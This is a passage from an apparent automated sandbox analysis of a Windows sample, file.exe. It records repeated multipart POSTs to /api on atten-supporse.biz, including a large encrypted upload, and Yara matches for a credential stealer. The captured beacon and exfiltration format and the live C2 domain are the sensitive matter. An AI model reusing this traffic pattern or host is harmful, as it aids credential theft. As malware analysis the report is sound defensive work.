2024-12-10 03:31:11 UTC	15071	OUT	Data Raw: 2d 2d 34 32 4e 45 39 37 4b 43 41 37 44 39 57 39 56 50 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 34 32 42 43 41 34 30 45 30 36 44 36 44 45 46 43 32 33 44 39 30 34 41 46 33 30 45 46 45 42 42 43 0d 0a 2d 2d 34 32 4e 45 39 37 4b 43 41 37 44 39 57 39 56 50 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 34 32 4e 45 39 37 4b 43 41 37 44 39 57 39 56 50 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 4f 47 53 31 31 2d 2d 4c 69 76 65 54 72 61 66 66 69 63 Data Ascii: --42NE97KCA7D9W9VPContent-Disposition: form-data; name="hwid"42BCA40E06D6DEFC23D904AF30EFEBBC--42NE97KCA7D9W9VPContent-Disposition: form-data; name="pid"2--42NE97KCA7D9W9VPContent-Disposition: form-data; name="lid"LOGS11--LiveTraffic
2024-12-10 03:31:12 UTC	1018	IN	HTTP/1.1 200 OK Date: Tue, 10 Dec 2024 03:31:12 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=u1crv9rjok3ag0g2ibotgklh6n; expires=Fri, 04-Apr-2025 21:17:51 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=n6y4zfWnhy1gSUeBk92l3M30NEWGnBgiW1Xah2cVlsguBMilijD8hx1Rw%2Btb6WGENN4sZdyOu9bfNxenZwJnNxTeVYQN4%2Bc5CYeQpeX%2BNgXZC3DjiiKn2zQ1UBgHscTL9eqqpsg%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8efa291e59b942b7-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1592&min_rtt=1587&rtt_var=605&sent=8&recv=19&lost=0&retrans=0&sent_bytes=2846&recv_bytes=16011&delivery_rate=1793611&cwnd=212&unsent_bytes=0&cid=57601891430fe1f7&ts=931&x=0"
2024-12-10 03:31:12 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 32 32 38 0d 0a Data Ascii: fok 8.46.123.228
2024-12-10 03:31:12 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.5	49708	104.21.64.1	443	4208	C:\Users\user\Desktop\file.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-10 03:31:13 UTC	274	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=2782DAON User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 20513 Host: atten-supporse.biz
2024-12-10 03:31:13 UTC	15331	OUT	Data Raw: 2d 2d 32 37 38 32 44 41 4f 4e 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 34 32 42 43 41 34 30 45 30 36 44 36 44 45 46 43 32 33 44 39 30 34 41 46 33 30 45 46 45 42 42 43 0d 0a 2d 2d 32 37 38 32 44 41 4f 4e 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 32 37 38 32 44 41 4f 4e 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 4f 47 53 31 31 2d 2d 4c 69 76 65 54 72 61 66 66 69 63 0d 0a 2d 2d 32 37 38 32 44 41 4f 4e 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 Data Ascii: --2782DAONContent-Disposition: form-data; name="hwid"42BCA40E06D6DEFC23D904AF30EFEBBC--2782DAONContent-Disposition: form-data; name="pid"3--2782DAONContent-Disposition: form-data; name="lid"LOGS11--LiveTraffic--2782DAONContent-Di
2024-12-10 03:31:13 UTC	5182	OUT	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 80 75 6e 20 0a e6 d6 fd 34 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 ce 0d 46 c1 dc ba 9f 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d6 b9 81 28 98 5b f7 d3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 3a 37 18 05 73 eb 7e 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 58 e7 06 a2 60 6e dd 4f 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 eb dc 60 14 cc ad fb 69 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 9d 1b 88 Data Ascii: un 4F([:7s~X`nO`i`
2024-12-10 03:31:16 UTC	1020	IN	HTTP/1.1 200 OK Date: Tue, 10 Dec 2024 03:31:16 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=35veqi2ersoi4afosuv7i2b17r; expires=Fri, 04-Apr-2025 21:17:53 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=BYIgyOcUn49u4Scjx5cidQu4B5HR2YiiIOCSffkuYihdO%2FE7C%2FcIVe8pSFaxF6QUUrytaaZ809sV98Y7zuwTBB7ZLY1FBNuQGnW1oUCojPkCJJknmgYNB5p1NuncS6q%2FsYnQ9Qw%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8efa292d4c9343f3-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1756&min_rtt=1740&rtt_var=686&sent=12&recv=25&lost=0&retrans=0&sent_bytes=2845&recv_bytes=21467&delivery_rate=1557333&cwnd=204&unsent_bytes=0&cid=1871d41d392b73b7&ts=2204&x=0"
2024-12-10 03:31:16 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 32 32 38 0d 0a Data Ascii: fok 8.46.123.228
2024-12-10 03:31:16 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.5	49709	104.21.64.1	443	4208	C:\Users\user\Desktop\file.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-10 03:31:17 UTC	283	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=2OCJPJZOUOH8LKT56A User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 1250 Host: atten-supporse.biz
2024-12-10 03:31:17 UTC	1250	OUT	Data Raw: 2d 2d 32 4f 43 4a 50 4a 5a 4f 55 4f 48 38 4c 4b 54 35 36 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 34 32 42 43 41 34 30 45 30 36 44 36 44 45 46 43 32 33 44 39 30 34 41 46 33 30 45 46 45 42 42 43 0d 0a 2d 2d 32 4f 43 4a 50 4a 5a 4f 55 4f 48 38 4c 4b 54 35 36 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 32 4f 43 4a 50 4a 5a 4f 55 4f 48 38 4c 4b 54 35 36 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 4f 47 53 31 31 2d 2d 4c 69 76 65 54 Data Ascii: --2OCJPJZOUOH8LKT56AContent-Disposition: form-data; name="hwid"42BCA40E06D6DEFC23D904AF30EFEBBC--2OCJPJZOUOH8LKT56AContent-Disposition: form-data; name="pid"1--2OCJPJZOUOH8LKT56AContent-Disposition: form-data; name="lid"LOGS11--LiveT
2024-12-10 03:31:18 UTC	1016	IN	HTTP/1.1 200 OK Date: Tue, 10 Dec 2024 03:31:18 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=5kgvpmte84qfhm663gn2pne5l2; expires=Fri, 04-Apr-2025 21:17:57 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=0dWEo90U7tQK8ii35BGJBONQv38EhNx1tZ6lFBC1V9EcNlKC8KonDMN6jgbTVznfaFLy9aPq0%2FEzj8zhFhae6T1M8cxu05wcTbxZj5QSJfwy%2BKnLOUmOF9y%2BZi3dCHAq7KEZSdI%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8efa29454f531819-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1467&min_rtt=1459&rtt_var=563&sent=5&recv=8&lost=0&retrans=0&sent_bytes=2846&recv_bytes=2169&delivery_rate=1914754&cwnd=215&unsent_bytes=0&cid=44cc158561e9f095&ts=757&x=0"
2024-12-10 03:31:18 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 32 32 38 0d 0a Data Ascii: fok 8.46.123.228
2024-12-10 03:31:18 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.5	49712	104.21.64.1	443	4208	C:\Users\user\Desktop\file.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-10 03:31:20 UTC	285	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=ESTOMURCU456190DQ8 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 584637 Host: atten-supporse.biz
2024-12-10 03:31:20 UTC	15331	OUT	Data Raw: 2d 2d 45 53 54 4f 4d 55 52 43 55 34 35 36 31 39 30 44 51 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 34 32 42 43 41 34 30 45 30 36 44 36 44 45 46 43 32 33 44 39 30 34 41 46 33 30 45 46 45 42 42 43 0d 0a 2d 2d 45 53 54 4f 4d 55 52 43 55 34 35 36 31 39 30 44 51 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 45 53 54 4f 4d 55 52 43 55 34 35 36 31 39 30 44 51 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 4f 47 53 31 31 2d 2d 4c 69 76 65 54 Data Ascii: --ESTOMURCU456190DQ8Content-Disposition: form-data; name="hwid"42BCA40E06D6DEFC23D904AF30EFEBBC--ESTOMURCU456190DQ8Content-Disposition: form-data; name="pid"1--ESTOMURCU456190DQ8Content-Disposition: form-data; name="lid"LOGS11--LiveT
2024-12-10 03:31:20 UTC	15331	OUT	Data Raw: 25 5b dd 8e 3f a2 f4 e1 6a 9f 39 a3 92 84 20 0d 9f df 94 eb 12 85 2a 72 89 b2 17 18 f5 a2 69 77 20 ea 93 06 38 08 cc 37 0b 02 0d 8d 28 7b dc 65 6c fa 99 08 bb 34 31 3a 82 ba b6 5d 3d 41 75 f5 84 58 a2 5b b9 ff b3 0a d5 2f 00 e3 7d 1b 98 c1 81 7b a6 b4 5c 0e 60 f7 0b 83 6d 2c a3 5a 13 34 d6 3b 81 9d 47 f5 d9 86 e2 ed a4 de 52 8d 86 37 f1 c6 27 db 6d 20 d6 01 69 c4 4f d8 27 a5 39 79 e0 40 e3 af 2d 3b 53 74 cc b6 e7 4e 25 90 bc 2a 4c db b6 55 a4 45 f7 e3 7e 4c 09 8b fb 64 c2 16 e9 94 66 9c e7 41 d1 23 e7 49 99 8b 13 aa fc 49 ed 78 5a e5 51 39 cd 21 58 b6 a7 08 d8 b8 f1 7f 16 15 63 0a 4f 63 66 a9 a9 9b 8d fe ae 0a 9c ba f3 24 1e 79 45 a1 ba 71 31 dd bb 5c 43 90 42 a6 b7 23 22 72 43 7a a5 2b 10 36 d8 96 ff 38 cc 08 0b fb fe 82 d6 36 33 95 4c 1e 5b 04 17 29 d8 Data Ascii: %[?j9 riw 87({el41:]=AuX[/}{\`m,Z4;GR7'm iO'9y@-;StN%LUE~LdfA#IIxZQ9!XcOcf$yEq1\CB#"rCz+6863L[)
2024-12-10 03:31:20 UTC	15331	OUT	Data Raw: 72 d7 44 76 28 62 9a c4 48 a0 e5 51 9f 08 5a ee 4e 37 40 79 41 96 25 73 ca 8a c7 4c 26 79 ae 35 78 37 a8 a1 de 5d 53 e1 d6 bd ad 03 a8 16 9f 70 d3 18 8f 48 a6 ec 4f 2f 71 68 9c 4b 90 d5 31 6b 91 81 c9 ac 91 17 a9 0f bf e7 93 72 69 72 d0 b8 3e 87 d2 8d d8 e6 d6 ae 5f 8d 81 4c df cd 2b a7 34 5d 32 bc 96 bb 1e c1 25 d1 1e 92 e1 ee da 8c cf 6a 25 f9 b9 33 11 ad c6 a9 5b d1 dc 7f cd 8c b1 a1 5a 94 2c 76 c2 05 de a1 be 8b 67 67 11 88 f6 3c a8 ad 75 f6 94 5b 9a 01 c6 af 3a 15 b2 24 58 f6 a4 3f 64 8a c3 74 c9 cd ae 6e e7 d6 35 d7 9a e8 87 11 9a df b2 5b a9 0f 6f 91 c9 56 fd 57 cf 2b 2a 8f 1b 96 4a cd 09 15 6e 49 1f 92 d4 94 42 07 d8 63 cc e8 16 e9 8d 7b f2 a2 62 88 d3 17 38 04 d2 42 05 ca 0c 1b cc 2b 25 28 ca e0 bb b7 93 07 4f d9 d9 ea f6 24 d0 d5 71 5c 4f 74 7e Data Ascii: rDv(bHQZN7@yA%sL&y5x7]SpHO/qhK1krir>_L+4]2%j%3[Z,vgg<u[:$X?dtn5[oVW+*JnIBc{b8B+%(O$q\Ot~
2024-12-10 03:31:20 UTC	15331	OUT	Data Raw: f1 cc 56 7e d7 bf e1 a2 cc 5e fa 05 63 fb 68 55 16 dc ab fa e7 5e 68 e7 d6 21 14 12 e9 d1 c3 fa d2 bc d4 71 f7 e5 3c 1d 16 cb ef a2 78 70 8b b1 f8 d7 6b 35 2a e7 f7 d2 72 ce 93 a5 c4 82 85 cf cc 4d fa 29 e1 a6 8f af 2f b4 67 57 2f 51 5c 35 91 75 67 8c b7 82 8a e9 ba 5e 0d 12 43 67 f8 f0 ec e0 b1 65 fa fe 16 c4 fa 12 da 40 98 c4 e1 ac 92 4a eb dd ff 0c e6 4d aa b0 72 c6 7e 9f 1e 66 d9 0a 7e 7e 1f 10 5a ff 35 6f 76 37 66 cd 4c 47 ee 7d ef 05 df ed 05 5f 27 00 54 51 72 71 80 2a 2f a5 23 f6 0d 5b 70 90 f8 e1 34 a4 56 79 90 fb 1b ab 34 0e ee 3e a9 d8 f1 39 b1 ea 7a 9a 90 8c 0a 98 d7 9f 8d 7a 00 cd ad 62 8d c8 7f 05 49 79 fb fc e0 e0 10 1f 24 92 7b 24 a0 f2 1b ba d0 82 2c e2 c2 76 ff ea e1 07 2f 3e 94 2c fd 72 f3 b9 93 25 88 af cc 7a a7 24 01 36 17 0a df a4 b3 Data Ascii: V~^chU^h!q<xpk5rM)/gW/Q\5ug^Cge@JMr~f~~Z5ov7fLG}_'TQrq/#[p4Vy4>9zzbIy${$,v/>,r%z$6
2024-12-10 03:31:20 UTC	15331	OUT	Data Raw: de fd 59 8d 0c 4a d9 b2 41 02 5d 9e 44 1f 84 27 7f 32 94 e3 e1 6b f5 fc 46 6f 89 52 f3 7c 2e 53 16 af 4c 51 4e 3f 12 9f 5d 71 1d fd 51 2b 24 11 35 9c 26 40 93 80 6b 7d 85 71 cd db d1 cc 80 d4 2b d1 ec 51 85 54 12 12 62 88 91 1e e4 d0 44 bd 2d b1 ec 0f 57 12 dc 4f 09 d4 a6 74 b8 3a a7 fa 71 ec e8 69 aa 22 bc 61 86 2c 3b 89 f3 b7 e5 6c 2d 8c 8a 78 93 d7 58 d3 dc 90 1e 8f 8c 04 0f 55 84 c3 a6 31 ff 53 90 72 36 c2 d4 73 be 7f 8b f3 42 2c 03 49 a1 a1 9e 4a 69 f4 bd b5 21 db 6d 92 e0 cd 63 98 ba ee b8 73 3a 7a 0e d3 8a d1 da 86 3f dd fa 80 38 de c8 95 8d 16 8f 1c 17 7f c0 0f 08 73 32 ff 7b 83 ff cf 0b f4 de 9f 4a 41 f3 bf bb ce 53 1b 50 07 25 86 2d df 82 c4 45 dc 6e 2e 5d f9 59 9a 9c 51 69 3f 3b 79 04 ba 00 92 83 32 38 d3 39 c0 ef 11 15 48 1a 68 34 0c c3 e6 cd Data Ascii: YJA]D'2kFoR\|.SLQN?]qQ+$5&@k}q+QTbD-WOt:qi"a,;l-xXU1Sr6sB,IJi!mcs:z?8s2{JASP%-En.]YQi?;y289Hh4
2024-12-10 03:31:20 UTC	15331	OUT	Data Raw: f7 a9 ef 3c 3d df b1 0f 0c 1b d9 c3 88 98 08 0d 98 29 8f 9d 59 d4 6b 53 3e 41 ac 2f 48 5f a3 af 2b 5d 5a 64 f8 34 ae bb dd e1 89 6b 12 3a 0b d2 c4 e0 26 04 fc 3d 70 50 e0 8b 98 b0 ca b6 13 57 e3 6f 37 23 06 9f 62 85 cd 84 25 42 e6 54 54 06 1c 5c 1b 49 4e 4a 2e 18 53 ed 15 b7 e3 c6 fb 31 cb 5e fc 58 ad 66 86 c9 d3 b5 ba 40 6d f0 59 9e f1 66 17 06 d4 34 50 36 a1 55 d2 d6 8c 2e d3 98 17 ae df 42 ed 96 32 cc ba 1f 5f 73 6a 8b d1 30 cf b0 0d d6 d2 9f e7 f3 3c 5a 78 4c 66 af 99 11 95 5a 58 60 fc 7b f8 9f 96 7f 14 74 cc 3d 2a 56 96 01 78 0d 12 45 8d 2f 1b f8 40 da 80 66 9c 35 85 2d 9b 8a 18 fd fe 5c 16 c0 38 91 cd e3 80 9d d0 e1 91 d0 58 31 f5 7b 3c d5 e1 77 d0 d9 b5 a5 4c ad aa 6d 2b 21 65 21 cf 71 70 c6 c9 2e 12 5f eb 23 a5 4b 76 aa 39 bd ba 45 2c 57 07 d8 44 Data Ascii: <=)YkS>A/H_+]Zd4k:&=pPWo7#b%BTT\INJ.S1^Xf@mYf4P6U.B2_sj0<ZxLfZX`{t=*VxE/@f5-\8X1{<wLm+!e!qp._#Kv9E,WD
2024-12-10 03:31:20 UTC	15331	OUT	Data Raw: 4b 80 6a 4a 41 51 67 07 be 76 e6 f9 ac dc 16 4d b3 08 91 e6 05 68 3e 29 5d c4 4f e5 14 24 34 c5 62 dd 84 ed 32 58 2a 7b e4 ee 88 75 c9 1d 3c 46 e9 e4 1c 07 59 b3 14 a9 50 d7 bd d1 c8 e3 09 78 b2 f1 58 07 89 6a 26 97 36 1f e8 6c f9 28 21 17 37 d3 45 29 b6 2b 0c b5 cb 8c 70 18 85 73 0f 88 46 87 d6 19 3d bb be b8 13 bc 6c 6d 32 31 62 04 4d 12 6a b4 86 aa 0c 33 e0 04 b6 b5 73 79 92 78 96 b8 23 36 d4 30 93 7c 3a 83 85 bc fe 78 3e 1e 0c 10 da 02 e8 65 6f 97 0e 78 08 d0 9c b5 1d 9d 8b 48 c9 c1 db a0 da 67 28 2a 6c 32 7d 84 c5 0e eb 0b b6 e2 3c d1 15 22 7d 2d 91 38 d7 65 2e 4c c3 f9 e3 9e d4 c9 d0 22 fc 09 eb 37 f7 e2 93 43 4a 05 c6 a3 e6 e6 73 4c 75 6b 03 04 39 88 c9 93 a2 d2 e9 26 0d 7e 48 3f c1 ad 72 96 fc cf 3b a5 d6 86 fd ce f1 d8 13 0f 91 bf 52 6c d6 a1 f7 Data Ascii: KjJAQgvMh>)]O$4b2X{u<FYPxXj&6l(!7E)+psF=lm21bMj3syx#60\|:x>eoxHg(l2}<"}-8e.L"7CJsLuk9&~H?r;Rl
2024-12-10 03:31:20 UTC	15331	OUT	Data Raw: 1b f9 be 86 1a b0 6a 74 24 e1 a3 14 70 40 a3 77 ca 42 b3 41 05 af 79 4c 9f 02 9f 4f 27 49 f3 68 9a 79 e1 93 c7 95 94 dd 67 2b 58 1a e0 03 4e c7 bc d1 69 a5 78 2f e2 1d 8c 5b 4c f5 9a 5e ff 4a a9 49 29 85 76 a8 7b fb 8b 2a 0e 3a eb 89 65 3e 95 f4 cc a2 18 92 78 68 02 8e ee ba 74 2c 03 a4 e1 3a f4 50 79 9b 70 e7 af 96 7b c2 e5 eb ff 9e 87 97 9c 11 44 33 25 40 77 0d e1 ad e7 7f 26 a8 11 c5 08 62 94 b0 6b 4e 39 b2 57 a4 ea 20 8d 90 8c c8 bb 87 7b 44 de 08 97 00 03 95 14 81 65 c0 c2 b2 df 0c c4 f8 3c a8 c8 5a d4 6a 20 f8 08 f6 78 a1 63 8d bc d2 70 76 1e dc 7e 75 bf d7 a6 32 c2 b5 58 b0 37 ba ae 2a fe 06 1c 11 0b 7f 59 53 23 fa e9 5c fb 1c d3 34 86 b4 57 13 9d 34 47 91 6b f6 b0 5f 38 a6 81 92 08 2e 96 fd 82 a5 dd 2a 9d 04 4a ca 59 c7 1f 8a d2 e9 88 a4 36 2a 6e Data Ascii: jt$p@wBAyLO'Ihyg+XNix/[L^JI)v{:e>xht,:Pyp{D3%@w&bkN9W {De<Zj xcpv~u2X7YS#\4W4Gk_8.JY6n
2024-12-10 03:31:20 UTC	15331	OUT	Data Raw: bc e8 73 fd dd 58 f3 c3 e1 2f d1 b5 6f d6 be f0 c1 59 30 e9 a3 97 e3 41 50 e8 8d e6 a3 cb a9 e9 18 b8 1f c7 83 59 34 3b a8 e0 4b aa 90 3d b2 a9 f3 c1 6d 87 b2 44 7e 5e 56 ba fa 88 14 d7 8c 40 54 4b d1 95 cc e9 2a 55 90 be 84 05 05 3b 14 75 32 79 f7 53 13 09 14 2e 62 10 59 1f 32 f4 41 32 6e bf df d4 f2 c7 18 9c b4 55 ee 67 fa f7 1d 9f fe d4 5b ad 4b 39 be eb fb 79 8b 2f e9 46 5a ea 62 f1 01 0f 9f af 37 6f 4a 2d d4 4c fd 3a c0 33 e1 a2 69 cd 32 dd fc e0 5c 74 a3 6f b7 2a 7e 56 57 6b c8 24 fc c8 30 20 d4 66 b7 ff 1c 1b 15 34 77 43 93 77 80 5a ff e8 28 9f 20 f7 62 dc 62 65 61 15 1a fe 76 f0 bf 7f e8 da ce 22 99 1c 6f 7e 20 86 4d 81 eb f3 aa be 13 e3 78 94 db 6a 62 07 38 7a 90 8b e5 6c a4 14 9f 3b 4c d3 41 e2 16 8b 30 3b 9e b1 8f 44 df 8c a5 ec 9b 3d 7c 36 c7 Data Ascii: sX/oY0APY4;K=mD~^V@TKU;u2yS.bY2A2nUg[K9y/FZb7oJ-L:3i2\to~VWk$0 f4wCwZ( bbeav"o~ Mxjb8zl;LA0;D=\|6
2024-12-10 03:31:20 UTC	15331	OUT	Data Raw: 63 2e ff 69 93 f4 65 4a e8 d0 2b ec b2 09 f9 66 4d 61 59 c3 2e 1f b7 e1 e8 92 e0 96 1b 05 c1 4b 42 9a be 66 54 0b ab 1a 4b 22 22 10 9a 6b cc 0f ac f7 39 8b 2f ec 6d c4 80 f2 43 2a 01 7d df 40 91 22 57 5e 08 5c 68 97 c2 c1 19 67 80 ef 56 e0 82 5d ed 85 a8 b5 55 c1 e7 f1 c0 bf 19 aa 0c 3e 2f c4 df 96 ed a1 87 c6 05 80 a2 d9 3f 5b de b6 39 62 d9 ce 58 3e 61 6e ea 43 5c 74 a9 b7 06 37 e7 61 c6 ef 1a 32 46 86 20 92 c9 3e bb 55 4a a1 2f fa 2d d2 d4 6d e3 be 9b 66 fe aa a0 e3 c4 47 a0 b9 f6 1f d2 49 6f 7a bc 74 76 72 4f ee 57 a9 0e b7 55 a9 83 19 1f 5a c3 9c e2 97 a7 a4 95 08 28 42 7e dd 27 69 65 4a 92 48 09 e7 8c 59 ca f7 1d 62 9e ac 36 69 25 61 3b 98 9a 2f c2 98 7d 4c 71 f5 22 da 31 2d 14 20 50 b7 3a 4a 26 d0 89 d4 64 9d 14 40 72 22 15 25 d7 1a 27 b9 34 ae d7 Data Ascii: c.ieJ+fMaY.KBfTK""k9/mC*}@"W^\hgV]U>/?[9bX>anC\t7a2F >UJ/-mfGIoztvrOWUZ(B~'ieJHYb6i%a;/}Lq"1- P:J&d@r"%'4
2024-12-10 03:31:26 UTC	1029	IN	HTTP/1.1 200 OK Date: Tue, 10 Dec 2024 03:31:26 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=cc3l31m1as7th7lcduji9tfsjq; expires=Fri, 04-Apr-2025 21:18:01 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=UFl2q1UCNUw27%2FuXzRgY0%2Bj%2FIi%2B6ae1hjvarnwNOgNJJdsPgJjHF8tM0h77mse4f3Jy8lx8d7rOkibd6iowyxUWzgS5F6pXoKRGFNKCIZdqGdnBYTtKe%2FRKp3XU%2BsgMrfSTysI8%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8efa2954ef982369-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1886&min_rtt=1865&rtt_var=715&sent=286&recv=606&lost=0&retrans=0&sent_bytes=2846&recv_bytes=587230&delivery_rate=1565683&cwnd=142&unsent_bytes=0&cid=ab60db242e52ae2b&ts=5999&x=0"

Target ID:	0
Start time:	22:31:00
Start date:	09/12/2024
Path:	C:\Users\user\Desktop\file.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\file.exe"
Imagebase:	0xec0000
File size:	1'832'448 bytes
MD5 hash:	73F9C0001107EB1B3AAB6549C6574F7F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.2089970639.00000000016DF000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.2112827223.00000000016DA000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.2089565968.00000000016DA000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 